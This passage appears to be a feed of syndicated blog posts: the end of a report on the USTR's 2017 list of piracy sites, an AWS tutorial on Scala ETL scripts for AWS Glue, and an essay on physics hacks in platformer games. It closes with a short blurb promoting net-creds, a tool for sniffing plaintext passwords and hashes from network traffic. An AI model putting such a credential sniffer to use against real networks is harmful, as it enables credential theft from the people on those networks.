The USTR notes Switzerland’s efforts to close a legal loophole that restricts enforcement and looks forward to a positive outcome when the draft amendment is considered by parliament.

Perhaps a little surprisingly given its recent anti-piracy efforts and overtures to the US, Russia’s leading social network VK.com again gets a place on the new list. The USTR recognizes VK’s efforts but insists that more needs to be done.

Social networking and e-commerce

“In 2016, VK reached licensing agreements with major record companies, took steps to limit third-party applications dedicated to downloading infringing content from the site, and experimented with content recognition technologies,” the USTR writes.

“Despite these positive signals, VK reportedly continues to be a hub of infringing activity and the U.S. motion picture industry reports that they find thousands of infringing files on the site each month.”

Finally, in addition to traditional pirate sites, the US also lists online marketplaces that allegedly fail to meet appropriate standards. Re-added to the list in 2016 after a brief hiatus in 2015, China’s Alibaba is listed again in 2017. The development provoked an angry response from the company.

Describing his company as a “scapegoat”, Alibaba Group President Michael Evans said that his platform had achieved a 25% drop in takedown requests and has even been removing infringing listings before they make it online.

“In light of all this, it’s clear that no matter how much action we take and progress we make, the USTR is not actually interested in seeing tangible results,” Evans said in a statement.

The full list of sites in the Notorious Markets Report 2017 (pdf) can be found below.

– 1fichier.com – (cyberlocker)
– 4shared.com – (cyberlocker)
– convert2mp3.net – (stream-ripper)
– Dhgate.com (e-commerce)
– Dopefile.pl – (cyberlocker)
– Firestorm-servers.com (pirate gaming service)
– Fmovies.is, Fmovies.se, Fmovies.to – (streaming)
– Gostream.is, Gomovies.to, 123movieshd.to (streaming)
– Indiamart.com (e-commerce)
– Kinogo.club, kinogo.co (streaming host, platform)
– Libgen.io, sci-hub.io, libgen.pw, sci-hub.cc, sci-hub.bz, libgen.info, lib.rus.ec, bookfi.org, bookzz.org, booker.org, booksc.org, book4you.org, bookos-z1.org, booksee.org, b-ok.org (research downloads)
– Movshare Group – Nowvideo.sx, wholecloud.net, auroravid.to, bitvid.sx, nowdownload.ch, cloudtime.to, mewatchseries.to, watchseries.ac (streaming)
– Movie4k.tv (streaming)
– MP3VA.com (music)
– Openload.co (cyberlocker / streaming)
– 1337x.to (torrent site)
– Primewire.ag (streaming)
– Torrentz2, Torrentz2.me, Torrentz2.is (torrent site)
– Rarbg.to (torrent site)
– Rebel (domain company)
– Repelis.tv (movie and TV linking)
– RuTracker.org (torrent site)
– Rapidgator.net (cyberlocker)
– Taobao.com (e-commerce)
– The Pirate Bay (torrent site)
– TVPlus, TVBrowser, Kuaikan (streaming apps and addons, China)
– Uploaded.net (cyberlocker)
– VK.com (social networking)

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

AWS Glue Now Supports Scala Scripts

Post Syndicated from Mehul Shah original https://aws.amazon.com/blogs/big-data/aws-glue-now-supports-scala-scripts/

We are excited to announce AWS Glue support for running ETL (extract, transform, and load) scripts in Scala. Scala lovers can rejoice because they now have one more powerful tool in their arsenal. Scala is the native language for Apache Spark, the underlying engine that AWS Glue offers for performing data transformations.

Beyond its elegant language features, writing Scala scripts for AWS Glue has two main advantages over writing scripts in Python. First, Scala is faster for custom transformations that do a lot of heavy lifting because there is no need to shovel data between Python and Apache Spark’s Scala runtime (that is, the Java virtual machine, or JVM). You can build your own transformations or invoke functions in third-party libraries. Second, it’s simpler to call functions in external Java class libraries from Scala because Scala is designed to be Java-compatible. It compiles to the same bytecode, and its data structures don’t need to be converted.

To illustrate these benefits, we walk through an example that analyzes a recent sample of the GitHub public timeline available from the GitHub archive. This site is an archive of public requests to the GitHub service, recording more than 35 event types ranging from commits and forks to issues and comments.

This post shows how to build an example Scala script that identifies highly negative issues in the timeline. It pulls out issue events in the timeline sample, analyzes their titles using the sentiment prediction functions from the Stanford CoreNLP libraries, and surfaces the most negative issues.

Getting started

Before we start writing scripts, we use AWS Glue crawlers to get a sense of the data—its structure and characteristics. We also set up a development endpoint and attach an Apache Zeppelin notebook, so we can interactively explore the data and author the script.

Crawl the data

The dataset used in this example was downloaded from the GitHub archive website into our sample dataset bucket in Amazon S3, and copied to the following locations:

s3://aws-glue-datasets-<region>/examples/scala-blog/githubarchive/data/

Choose the best folder by replacing <region> with the region that you’re working in, for example, us-east-1. Crawl this folder, and put the results into a database named githubarchive in the AWS Glue Data Catalog, as described in the AWS Glue Developer Guide. This folder contains 12 hours of the timeline from January 22, 2017, and is organized hierarchically (that is, partitioned) by year, month, and day.

When finished, use the AWS Glue console to navigate to the table named data in the githubarchive database. Notice that this data has eight top-level columns, which are common to each event type, and three partition columns that correspond to year, month, and day.

Choose the payload column, and you will notice that it has a complex schema—one that reflects the union of the payloads of event types that appear in the crawled data. Also note that the schema that crawlers generate is a subset of the true schema because they sample only a subset of the data.

Set up the library, development endpoint, and notebook

Next, you need to download and set up the libraries that estimate the sentiment in a snippet of text. The Stanford CoreNLP libraries contain a number of human language processing tools, including sentiment prediction.

Download the Stanford CoreNLP libraries. Unzip the .zip file, and you’ll see a directory full of jar files. For this example, the following jars are required:

  • stanford-corenlp-3.8.0.jar
  • stanford-corenlp-3.8.0-models.jar
  • ejml-0.23.jar

Upload these files to an Amazon S3 path that is accessible to AWS Glue so that it can load these libraries when needed. For this example, they are in s3://glue-sample-other/corenlp/.

Development endpoints are static Spark-based environments that can serve as the backend for data exploration. You can attach notebooks to these endpoints to interactively send commands and explore and analyze your data. These endpoints have the same configuration as that of AWS Glue’s job execution system. So, commands and scripts that work there also work the same when registered and run as jobs in AWS Glue.

To set up an endpoint and a Zeppelin notebook to work with that endpoint, follow the instructions in the AWS Glue Developer Guide. When you are creating an endpoint, be sure to specify the locations of the previously mentioned jars in the Dependent jars path as a comma-separated list. Otherwise, the libraries will not be loaded.

After you set up the notebook server, go to the Zeppelin notebook by choosing Dev Endpoints in the left navigation pane on the AWS Glue console. Choose the endpoint that you created. Next, choose the Notebook Server URL, which takes you to the Zeppelin server. Log in using the notebook user name and password that you specified when creating the notebook. Finally, create a new note to try out this example.

Each notebook is a collection of paragraphs, and each paragraph contains a sequence of commands and the output for that command. Moreover, each notebook includes a number of interpreters. If you set up the Zeppelin server using the console, the (Python-based) pyspark and (Scala-based) spark interpreters are already connected to your new development endpoint, with pyspark as the default. Therefore, throughout this example, you need to prepend %spark at the top of your paragraphs. In this example, we omit these for brevity.

Working with the data

In this section, we use AWS Glue extensions to Spark to work with the dataset. We look at the actual schema of the data and filter out the interesting event types for our analysis.

Start with some boilerplate code to import libraries that you need:

%spark

import com.amazonaws.services.glue.DynamicRecord
import com.amazonaws.services.glue.GlueContext
import com.amazonaws.services.glue.util.GlueArgParser
import com.amazonaws.services.glue.util.Job
import com.amazonaws.services.glue.util.JsonOptions
import com.amazonaws.services.glue.types._
import org.apache.spark.SparkContext

Then, create the Spark and AWS Glue contexts needed for working with the data:

@transient val spark: SparkContext = SparkContext.getOrCreate()
val glueContext: GlueContext = new GlueContext(spark)

You need the transient decorator on the SparkContext when working in Zeppelin; otherwise, you will run into a serialization error when executing commands.

Dynamic frames

This section shows how to create a dynamic frame that contains the GitHub records in the table that you crawled earlier. A dynamic frame is the basic data structure in AWS Glue scripts. It is like an Apache Spark data frame, except that it is designed and optimized for data cleaning and transformation workloads. A dynamic frame is well-suited for representing semi-structured datasets like the GitHub timeline.

A dynamic frame is a collection of dynamic records. In Spark lingo, it is an RDD (resilient distributed dataset) of DynamicRecords. A dynamic record is a self-describing record. Each record encodes its columns and types, so every record can have a schema that is unique from all others in the dynamic frame. This is convenient and often more efficient for datasets like the GitHub timeline, where payloads can vary drastically from one event type to another.

The following creates a dynamic frame, github_events, from your table:

val github_events = glueContext
                    .getCatalogSource(database = "githubarchive", tableName = "data")
                    .getDynamicFrame()

The getCatalogSource() method returns a DataSource, which represents a particular table in the Data Catalog. The getDynamicFrame() method returns a dynamic frame from the source.

Recall that the crawler created a schema from only a sample of the data. You can scan the entire dataset, count the rows, and print the complete schema as follows:

github_events.count
github_events.printSchema()

The result looks like the following:

The data has 414,826 records. As before, notice that there are eight top-level columns, and three partition columns. If you scroll down, you’ll also notice that the payload is the most complex column.

Run functions and filter records

This section describes how you can create your own functions and invoke them seamlessly to filter records. Unlike filtering with Python lambdas, Scala scripts do not need to convert records from one language representation to another, thereby reducing overhead and running much faster.

Let’s create a function that picks only the IssuesEvents from the GitHub timeline. These events are generated whenever someone posts an issue for a particular repository. Each GitHub event record has a field, “type”, that indicates the kind of event it is. The issueFilter() function returns true for records that are IssuesEvents.

def issueFilter(rec: DynamicRecord): Boolean = { 
    rec.getField("type").exists(_ == "IssuesEvent") 
}

Note that the getField() method returns an Option[Any] type, so you first need to check that it exists before checking the type.

You pass this function to the filter transformation, which applies the function on each record and returns a dynamic frame of those records that pass.

val issue_events =  github_events.filter(issueFilter)

Now, let’s look at the size and schema of issue_events.

issue_events.count
issue_events.printSchema()

It’s much smaller (14,063 records), and the payload schema is less complex, reflecting only the schema for issues. Keep a few essential columns for your analysis, and drop the rest using the ApplyMapping() transform:

val issue_titles = issue_events.applyMapping(Seq(("id", "string", "id", "string"),
                                                 ("actor.login", "string", "actor", "string"), 
                                                 ("repo.name", "string", "repo", "string"),
                                                 ("payload.action", "string", "action", "string"),
                                                 ("payload.issue.title", "string", "title", "string")))
issue_titles.show()

The ApplyMapping() transform is quite handy for renaming columns, casting types, and restructuring records. The preceding code snippet tells the transform to select the fields (or columns) that are enumerated in the left half of the tuples and map them to the fields and types in the right half.

Estimating sentiment using Stanford CoreNLP

To focus on the most pressing issues, you might want to isolate the records with the most negative sentiments. The Stanford CoreNLP libraries are Java-based and offer sentiment-prediction functions. Accessing these functions through Python is possible, but quite cumbersome. It requires creating Python surrogate classes and objects for those found on the Java side. Instead, with Scala support, you can use those classes and objects directly and invoke their methods. Let’s see how.

First, import the libraries needed for the analysis:

import java.util.Properties
import edu.stanford.nlp.ling.CoreAnnotations
import edu.stanford.nlp.neural.rnn.RNNCoreAnnotations
import edu.stanford.nlp.pipeline.{Annotation, StanfordCoreNLP}
import edu.stanford.nlp.sentiment.SentimentCoreAnnotations
import scala.collection.convert.wrapAll._

The Stanford CoreNLP libraries have a main driver that orchestrates all of their analysis. The driver setup is heavyweight, setting up threads and data structures that are shared across analyses. Apache Spark runs on a cluster with a main driver process and a collection of backend executor processes that do most of the heavy sifting of the data.

The Stanford CoreNLP shared objects are not serializable, so they cannot be distributed easily across a cluster. Instead, you need to initialize them once for every backend executor process that might need them. Here is how to accomplish that:

val props = new Properties()
props.setProperty("annotators", "tokenize, ssplit, parse, sentiment")
props.setProperty("parse.maxlen", "70")

object myNLP {
    lazy val coreNLP = new StanfordCoreNLP(props)
}

The properties tell the libraries which annotators to execute and how many words to process. The preceding code creates an object, myNLP, with a field coreNLP that is lazily evaluated. This field is initialized only when it is needed, and only once. So, when the backend executors start processing the records, each executor initializes the driver for the Stanford CoreNLP libraries only one time.

Next is a function that estimates the sentiment of a text string. It first calls Stanford CoreNLP to annotate the text. Then, it pulls out the sentences and takes the average sentiment across all the sentences. The sentiment is a double, from 0.0 as the most negative to 4.0 as the most positive.

def estimatedSentiment(text: String): Double = {
    if ((text == null) || (!text.nonEmpty)) { return Double.NaN }
    val annotations = myNLP.coreNLP.process(text)
    val sentences = annotations.get(classOf[CoreAnnotations.SentencesAnnotation])
    sentences.foldLeft(0.0)( (csum, x) => { 
        csum + RNNCoreAnnotations.getPredictedClass(x.get(classOf[SentimentCoreAnnotations.SentimentAnnotatedTree])) 
    }) / sentences.length
}

Now, let’s estimate the sentiment of the issue titles and add that computed field as part of the records. You can accomplish this with the map() method on dynamic frames:

val issue_sentiments = issue_titles.map((rec: DynamicRecord) => { 
    val mbody = rec.getField("title")
    mbody match {
        case Some(mval: String) => { 
            rec.addField("sentiment", ScalarNode(estimatedSentiment(mval)))
            rec }
        case _ => rec
    }
})

The map() method applies the user-provided function on every record. The function takes a DynamicRecord as an argument and returns a DynamicRecord. The code above computes the sentiment, adds it in a top-level field, sentiment, to the record, and returns the record.

Count the records with sentiment and show the schema. This takes a few minutes because Spark must initialize the library and run the sentiment analysis, which can be involved.

issue_sentiments.count
issue_sentiments.printSchema()

Notice that all records were processed (14,063), and the sentiment value was added to the schema.

Finally, let’s pick out the titles that have the lowest sentiment (less than 1.5). Count them and print out a sample to see what some of the titles look like.

val pressing_issues = issue_sentiments.filter(_.getField("sentiment").exists(_.asInstanceOf[Double] < 1.5))
pressing_issues.count
pressing_issues.show(10)

Next, write them all to a file so that you can handle them later. (You’ll need to replace the output path with your own.)

glueContext.getSinkWithFormat(connectionType = "s3", 
                              options = JsonOptions("""{"path": "s3://<bucket>/out/path/"}"""), 
                              format = "json")
            .writeDynamicFrame(pressing_issues)

Take a look in the output path, and you can see the output files.

Putting it all together

Now, let’s create a job from the preceding interactive session. The following script combines all the commands from earlier. It processes the GitHub archive files and writes out the highly negative issues:

import com.amazonaws.services.glue.DynamicRecord
import com.amazonaws.services.glue.GlueContext
import com.amazonaws.services.glue.util.GlueArgParser
import com.amazonaws.services.glue.util.Job
import com.amazonaws.services.glue.util.JsonOptions
import com.amazonaws.services.glue.types._
import org.apache.spark.SparkContext
import java.util.Properties
import edu.stanford.nlp.ling.CoreAnnotations
import edu.stanford.nlp.neural.rnn.RNNCoreAnnotations
import edu.stanford.nlp.pipeline.{Annotation, StanfordCoreNLP}
import edu.stanford.nlp.sentiment.SentimentCoreAnnotations
import scala.collection.convert.wrapAll._

object GlueApp {

    object myNLP {
        val props = new Properties()
        props.setProperty("annotators", "tokenize, ssplit, parse, sentiment")
        props.setProperty("parse.maxlen", "70")

        lazy val coreNLP = new StanfordCoreNLP(props)
    }

    def estimatedSentiment(text: String): Double = {
        if ((text == null) || (!text.nonEmpty)) { return Double.NaN }
        val annotations = myNLP.coreNLP.process(text)
        val sentences = annotations.get(classOf[CoreAnnotations.SentencesAnnotation])
        sentences.foldLeft(0.0)( (csum, x) => { 
            csum + RNNCoreAnnotations.getPredictedClass(x.get(classOf[SentimentCoreAnnotations.SentimentAnnotatedTree])) 
        }) / sentences.length
    }

    def main(sysArgs: Array[String]) {
        val spark: SparkContext = SparkContext.getOrCreate()
        val glueContext: GlueContext = new GlueContext(spark)

        val dbname = "githubarchive"
        val tblname = "data"
        val outpath = "s3://<bucket>/out/path/"

        val github_events = glueContext
                            .getCatalogSource(database = dbname, tableName = tblname)
                            .getDynamicFrame()

        val issue_events =  github_events.filter((rec: DynamicRecord) => {
            rec.getField("type").exists(_ == "IssuesEvent")
        })

        val issue_titles = issue_events.applyMapping(Seq(("id", "string", "id", "string"),
                                                         ("actor.login", "string", "actor", "string"), 
                                                         ("repo.name", "string", "repo", "string"),
                                                         ("payload.action", "string", "action", "string"),
                                                         ("payload.issue.title", "string", "title", "string")))

        val issue_sentiments = issue_titles.map((rec: DynamicRecord) => { 
            val mbody = rec.getField("title")
            mbody match {
                case Some(mval: String) => { 
                    rec.addField("sentiment", ScalarNode(estimatedSentiment(mval)))
                    rec }
                case _ => rec
            }
        })

        val pressing_issues = issue_sentiments.filter(_.getField("sentiment").exists(_.asInstanceOf[Double] < 1.5))

        glueContext.getSinkWithFormat(connectionType = "s3", 
                              options = JsonOptions(s"""{"path": "$outpath"}"""), 
                              format = "json")
                    .writeDynamicFrame(pressing_issues)
    }
}

Notice that the script is enclosed in a top-level object called GlueApp, which serves as the script’s entry point for the job. (You’ll need to replace the output path with your own.) Upload the script to an Amazon S3 location so that AWS Glue can load it when needed.

To create the job, open the AWS Glue console. Choose Jobs in the left navigation pane, and then choose Add job. Create a name for the job, and specify a role with permissions to access the data. Choose An existing script that you provide, and choose Scala as the language.

For the Scala class name, type GlueApp to indicate the script’s entry point. Specify the Amazon S3 location of the script.

Choose Script libraries and job parameters. In the Dependent jars path field, enter the Amazon S3 locations of the Stanford CoreNLP libraries from earlier as a comma-separated list (without spaces). Then choose Next.

No connections are needed for this job, so choose Next again. Review the job properties, and choose Finish. Finally, choose Run job to execute the job.

You can simply edit the script’s input table and output path to run this job on whatever GitHub timeline datasets that you might have.

Conclusion

In this post, we showed how to write AWS Glue ETL scripts in Scala via notebooks and how to run them as jobs. Scala has the advantage that it is the native language for the Spark runtime. With Scala, it is easier to call Scala or Java functions and third-party libraries for analyses. Moreover, data processing is faster in Scala because there’s no need to convert records from one language runtime to another.

You can find more example of Scala scripts in our GitHub examples repository: https://github.com/awslabs/aws-glue-samples. We encourage you to experiment with Scala scripts and let us know about any interesting ETL flows that you want to share.

Happy Glue-ing!

 


Additional Reading

If you found this post useful, be sure to check out Simplify Querying Nested JSON with the AWS Glue Relationalize Transform and Genomic Analysis with Hail on Amazon EMR and Amazon Athena.

 


About the Authors

Mehul Shah is a senior software manager for AWS Glue. His passion is leveraging the cloud to build smarter, more efficient, and easier to use data systems. He has three girls, and, therefore, he has no spare time.

 

 

 

Ben Sowell is a software development engineer at AWS Glue.

 

 

 

 
Vinay Vivili is a software development engineer for AWS Glue.

 

 

 

Physics cheats

Post Syndicated from Eevee original https://eev.ee/blog/2018/01/06/physics-cheats/

Anonymous asks:

something about how we tweak physics to “work” better in games?

Ho ho! Work. Get it? Like in physics…?

Hitboxes

Hitbox” is perhaps not the most accurate term, since the shape used for colliding with the environment and the shape used for detecting damage might be totally different. They’re usually the same in simple platformers, though, and that’s what most of my games have been.

The hitbox is the biggest physics fudge by far, and it exists because of a single massive approximation that (most) games make: you’re controlling a single entity in the abstract, not a physical body in great detail.

That is: when you walk with your real-world meat shell, you perform a complex dance of putting one foot in front of the other, a motion you spent years perfecting. When you walk in a video game, you press a single “walk” button. Your avatar may play an animation that moves its legs back and forth, but since you’re not actually controlling the legs independently (and since simulating them is way harder), the game just treats you like a simple shape. Fairly often, this is a box, or something very box-like.

An Eevee sprite standing on faux ground; the size of the underlying image and the hitbox are outlined

Since the player has no direct control over the exact placement of their limbs, it would be slightly frustrating to have them collide with the world. This is especially true in cases like the above, where the tail and left ear protrude significantly out from the main body. If that Eevee wanted to stand against a real-world wall, she would simply tilt her ear or tail out of the way, so there’s no reason for the ear to block her from standing against a game wall. To compensate for this, the ear and tail are left out of the collision box entirely and will simply jut into a wall if necessary — a goofy affordance that’s so common it doesn’t even register as unusual. As a bonus (assuming this same box is used for combat), she won’t take damage from projectiles that merely graze past an ear.

(One extra consideration for sprite games in particular: the hitbox ought to be horizontally symmetric around the sprite’s pivot — i.e. the point where the entity is truly considered to be standing — so that the hitbox doesn’t abruptly move when the entity turns around!)

Corners

Treating the player (and indeed most objects) as a box has one annoying side effect: boxes have corners. Corners can catch on other corners, even by a single pixel. Real-world bodies tend to be a bit rounder and squishier and this can tolerate grazing a corner; even real-world boxes will simply rotate a bit.

Ah, but in our faux physics world, we generally don’t want conscious actors (such as the player) to rotate, even with a realistic physics simulator! Real-world bodies are made of parts that will generally try to keep you upright, after all; you don’t tilt back and forth much.

One way to handle corners is to simply remove them from conscious actors. A hitbox doesn’t have to be a literal box, after all. A popular alternative — especially in Unity where it’s a standard asset — is the pill-shaped capsule, which has semicircles/hemispheres on the top and bottom and a cylindrical body in 3D. No corners, no problem.

Of course, that introduces a new problem: now the player can’t balance precariously on edges without their rounded bottom sliding them off. Alas.

If you’re stuck with corners, then, you may want to use a corner bump, a term I just made up. If the player would collide with a corner, but the collision is only by a few pixels, just nudge them to the side a bit and carry on.

An Eevee sprite trying to move sideways into a shallow ledge; the game bumps her upwards slightly, so she steps onto it instead

When the corner is horizontal, this creates stairs! This is, more or less kinda, how steps work in Doom: when the player tries to cross from one sector into another, if the height difference is 24 units or less, the game simply bumps them upwards to the height of the new floor and lets them continue on.

Implementing this in a game without Doom’s notion of sectors is a little trickier. In fact, I still haven’t done it. Collision detection based on rejection gets it for free, kinda, but it’s not very deterministic and it breaks other things. But that’s a whole other post.

Gravity

Gravity is pretty easy. Everything accelerates downwards all the time. What’s interesting are the exceptions.

Jumping

Jumping is a giant hack.

Think about how actual jumping works: you tense your legs, which generally involves bending your knees first, and then spring upwards. In a platformer, you can just leap whenever you feel like it, which is nonsense. Also you go like twenty feet into the air?

Worse, most platformers allow variable-height jumping, where your jump is lower if you let go of the jump button while you’re in the air. Normally, one would expect to have to decide how much force to put into the jump beforehand.

But of course this is about convenience of controls: when jumping is your primary action, you want to be able to do it immediately, without any windup for how high you want to jump.

(And then there’s double jumping? Come on.)

Air control is a similar phenomenon: usually you’d jump in a particular direction by controlling how you push off the ground with your feet, but in a video game, you don’t have feet! You only have the box. The compromise is to let you control your horizontal movement to a limit degree in midair, even though that doesn’t make any sense. (It’s way more fun, though, and overall gives you more movement options, which are good to have in an interactive medium.)

Air control also exposes an obvious place that game physics collide with the realistic model of serious physics engines. I’ve mentioned this before, but: if you use Real Physics™ and air control yourself into a wall, you might find that you’ll simply stick to the wall until you let go of the movement buttons. Why? Remember, player movement acts as though an external force were pushing you around (and from the perspective of a Real™ physics engine, this is exactly how you’d implement it) — so air-controlling into a wall is equivalent to pushing a book against a wall with your hand, and the friction with the wall holds you in place. Oops.

Ground sticking

Another place game physics conflict with physics engines is with running to the top of a slope. On a real hill, of course, you land on top of the slope and are probably glad of it; slopes are hard to climb!

An Eevee moves to the top of a slope, and rather than step onto the flat top, she goes flying off into the air

In a video game, you go flying. Because you’re a box. With momentum. So you hit the peak and keep going in the same direction. Which is diagonally upwards.

Projectiles

To make them more predictable, projectiles generally aren’t subject to gravity, at least as far as I’ve seen. The real world does not have such an exemption. The real world imposes gravity even on sniper rifles, which in a video game are often implemented as an instant trace unaffected by anything in the world because the bullet never actually exists in the world.

Resistance

Ah. Welcome to hell.

Water

Water is an interesting case, and offhand I don’t know the gritty details of how games implement it. In the real world, water applies a resistant drag force to movement — and that force is proportional to the square of velocity, which I’d completely forgotten until right now. I am almost positive that no game handles that correctly. But then, in real-world water, you can push against the water itself for movement, and games don’t simulate that either. What’s the rough equivalent?

The Sonic Physics Guide suggests that Sonic handles it by basically halving everything: acceleration, max speed, friction, etc. When Sonic enters water, his speed is cut; when Sonic exits water, his speed is increased.

That last bit feels validating — I could swear Metroid Prime did the same thing, and built my own solution around it, but couldn’t remember for sure. It makes no sense, of course, for a jump to become faster just because you happened to break the surface of the water, but it feels fantastic.

The thing I did was similar, except that I didn’t want to add a multiplier in a dozen places when you happen to be underwater (and remember which ones need it to be squared, etc.). So instead, I calculate everything completely as normal, so velocity is exactly the same as it would be on dry land — but the distance you would move gets halved. The effect seems to be pretty similar to most platformers with water, at least as far as I can tell. It hasn’t shown up in a published game and I only added this fairly recently, so I might be overlooking some reason this is a bad idea.

(One reason that comes to mind is that velocity is now a little white lie while underwater, so anything relying on velocity for interesting effects might be thrown off. Or maybe that’s correct, because velocity thresholds should be halved underwater too? Hm!)

Notably, air is also a fluid, so it should behave the same way (just with different constants). I definitely don’t think any games apply air drag that’s proportional to the square of velocity.

Friction

Friction is, in my experience, a little handwaved. Probably because real-world friction is so darn complicated.

Consider that in the real world, we want very high friction on the surfaces we walk on — shoes and tires are explicitly designed to increase it, even. We move by bracing a back foot against the ground and using that to push ourselves forward, so we want the ground to resist our push as much as possible.

In a game world, we are a box. We move by being pushed by some invisible outside force, so if the friction between ourselves and the ground is too high, we won’t be able to move at all! That’s complete nonsense physically, but it turns out to be handy in some cases — for example, highish friction can simulate walking through deep mud, which should be difficult due to fluid drag and low friction.

But the best-known example of the fakeness of game friction is video game ice. Walking on real-world ice is difficult because the low friction means low grip; your feet are likely to slip out from under you, and you’ll simply fall down and have trouble moving at all. In a video game, you can’t fall down, so you have the opposite experience: you spend most of your time sliding around uncontrollably. Yet ice is so common in video games (and perhaps so uncommon in places I’ve lived) that I, at least, had never really thought about this disparity until an hour or so ago.

Game friction vs real-world friction

Real-world friction is a force. It’s the normal force (which is the force exerted by the object on the surface) times some constant that depends on how the two materials interact.

Force is mass times acceleration, and platformers often ignore mass, so friction ought to be an acceleration — applied against the object’s movement, but never enough to push it backwards.

I haven’t made any games where variable friction plays a significant role, but my gut instinct is that low friction should mean the player accelerates more slowly but has a higher max speed, and high friction should mean the opposite. I see from my own source code that I didn’t even do what I just said, so let’s defer to some better-made and well-documented games: Sonic and Doom.

In Sonic, friction is a fixed value subtracted from the player’s velocity (regardless of direction) each tic. Sonic has a fixed framerate, so the units are really pixels per tic squared (i.e. acceleration), multiplied by an implicit 1 tic per tic. So far, so good.

But Sonic’s friction only applies if the player isn’t pressing or . Hang on, that isn’t friction at all; that’s just deceleration! That’s equivalent to jogging to a stop. If friction were lower, Sonic would take longer to stop, but otherwise this is only tangentially related to friction.

(In fairness, this approach would decently emulate friction for non-conscious sliding objects, which are never going to be pressing movement buttons. Also, we don’t have the Sonic source code, and the name “friction” is a fan invention; the Sonic Physics Guide already uses “deceleration” to describe the player’s acceleration when turning around.)

Okay, let’s try Doom. In Doom, the default friction is 90.625%.

Hang on, what?

Yes, in Doom, friction is a multiplier applied every tic. Doom runs at 35 tics per second, so this is a multiplier of 0.032 per second. Yikes!

This isn’t anything remotely like real friction, but it’s much easier to implement. With friction as acceleration, the game has to know both the direction of movement (so it can apply friction in the opposite direction) and the magnitude (so it doesn’t overshoot and launch the object in the other direction). That means taking a semi-costly square root and also writing extra code to cap the amount of friction. With a multiplier, neither is necessary; just multiply the whole velocity vector and you’re done.

There are some downsides. One is that objects will never actually stop, since multiplying by 3% repeatedly will never produce a result of zero — though eventually the speed will become small enough to either slip below a “minimum speed” threshold or simply no longer fit in a float representation. Another is that the units are fairly meaningless: with Doom’s default friction of 90.625%, about how long does it take for the player to stop? I have no idea, partly because “stop” is ambiguous here! If friction were an acceleration, I could divide it into the player’s max speed to get a time.

All that aside, what are the actual effects of changing Doom’s friction? What an excellent question that’s surprisingly tricky to answer. (Note that friction can’t be changed in original Doom, only in the Boom port and its derivatives.) Here’s what I’ve pieced together.

Doom’s “friction” is really two values. “Friction” itself is a multiplier applied to moving objects on every tic, but there’s also a move factor which defaults to \(\frac{1}{32} = 0.03125\) and is derived from friction for custom values.

Every tic, the player’s velocity is multiplied by friction, and then increased by their speed times the move factor.

$$
v(n) = v(n – 1) \times friction + speed \times move factor
$$

Eventually, the reduction from friction will balance out the speed boost. That happens when \(v(n) = v(n – 1)\), so we can rearrange it to find the player’s effective max speed:

$$
v = v \times friction + speed \times move factor \\
v – v \times friction = speed \times move factor \\
v = speed \times \frac{move factor}{1 – friction}
$$

For vanilla Doom’s move factor of 0.03125 and friction of 0.90625, that becomes:

$$
v = speed \times \frac{\frac{1}{32}}{1 – \frac{29}{32}} = speed \times \frac{\frac{1}{32}}{\frac{3}{32}} = \frac{1}{3} \times speed
$$

Curiously, “speed” is three times the maximum speed an actor can actually move. Doomguy’s run speed is 50, so in practice he moves a third of that, or 16⅔ units per tic. (Of course, this isn’t counting SR40, a bug that lets Doomguy run ~40% faster than intended diagonally.)

So now, what if you change friction? Even more curiously, the move factor is calculated completely differently depending on whether friction is higher or lower than the default Doom amount:

$$
move factor = \begin{cases}
\frac{133 – 128 \times friction}{544} &≈ 0.244 – 0.235 \times friction & \text{ if } friction \ge \frac{29}{32} \\
\frac{81920 \times friction – 70145}{1048576} &≈ 0.078 \times friction – 0.067 & \text{ otherwise }
\end{cases}
$$

That’s pretty weird? Complicating things further is that low friction (which means muddy terrain, remember) has an extra multiplier on its move factor, depending on how fast you’re already going — the idea is apparently that you have a hard time getting going, but it gets easier as you find your footing. The extra multiplier maxes out at 8, which makes the two halves of that function meet at the vanilla Doom value.

A graph of the relationship between friction and move factor

That very top point corresponds to the move factor from the original game. So no matter what you do to friction, the move factor becomes lower. At 0.85 and change, you can no longer move at all; below that, you move backwards.

From the formula above, it’s easy to see what changes to friction and move factor will do to Doomguy’s stable velocity. Move factor is in the numerator, so increasing it will increase stable velocity — but it can’t increase, so stable velocity can only ever decrease. Friction is in the denominator, but it’s subtracted from 1, so increasing friction will make the denominator a smaller value less than 1, i.e. increase stable velocity. Combined, we get this relationship between friction and stable velocity.

A graph showing stable velocity shooting up dramatically as friction increases

As friction approaches 1, stable velocity grows without bound. This makes sense, given the definition of \(v(n)\) — if friction is 1, the velocity from the previous tic isn’t reduced at all, so we just keep accelerating freely.

All of this is why I’m wary of using multipliers.

Anyway, this leaves me with one last question about the effects of Doom’s friction: how long does it take to reach stable velocity? Barring precision errors, we’ll never truly reach stable velocity, but let’s say within 5%. First we need a closed formula for the velocity after some number of tics. This is a simple recurrence relation, and you can write a few terms out yourself if you want to be sure this is right.

$$
v(n) = v_0 \times friction^n + speed \times move factor \times \frac{friction^n – 1}{friction – 1}
$$

Our initial velocity is zero, so the first term disappears. Set this equal to the stable formula and solve for n:

$$
speed \times move factor \times \frac{friction^n – 1}{friction – 1} = (1 – 5\%) \times speed \times \frac{move factor}{1 – friction} \\
friction^n – 1 = -(1 – 5\%) \\
n = \frac{\ln 5\%}{\ln friction}
$$

Speed” and move factor disappear entirely, which makes sense, and this is purely a function of friction (and how close we want to get). For vanilla Doom, that comes out to 30.4, which is a little less than a second. For other values of friction:

A graph of time to stability which leaps upwards dramatically towards the right

As friction increases (which in Doom terms means the surface is more slippery), it takes longer and longer to reach stable speed, which is in turn greater and greater. For lesser friction (i.e. mud), stable speed is lower, but reached fairly quickly. (Of course, the extra “getting going” multiplier while in mud adds some extra time here, but including that in the graph is a bit more complicated.)

I think this matches with my instincts above. How fascinating!

What’s that? This is way too much math and you hate it? Then don’t use multipliers in game physics.

Uh

That was a hell of a diversion!

I guess the goofiest stuff in basic game physics is really just about mapping player controls to in-game actions like jumping and deceleration; the rest consists of hacks to compensate for representing everything as a box.

net-creds – Sniff Passwords From Interface or PCAP File

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/net-creds-sniff-passwords-from-interface-or-pcap-file/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

net-creds – Sniff Passwords From Interface or PCAP File

net-creds is a Python-based tool for sniffing plaintext passwords and hashes from a network interface or PCAP file – it doesn’t rely on port numbers for service identification and can concatenate fragmented packets.

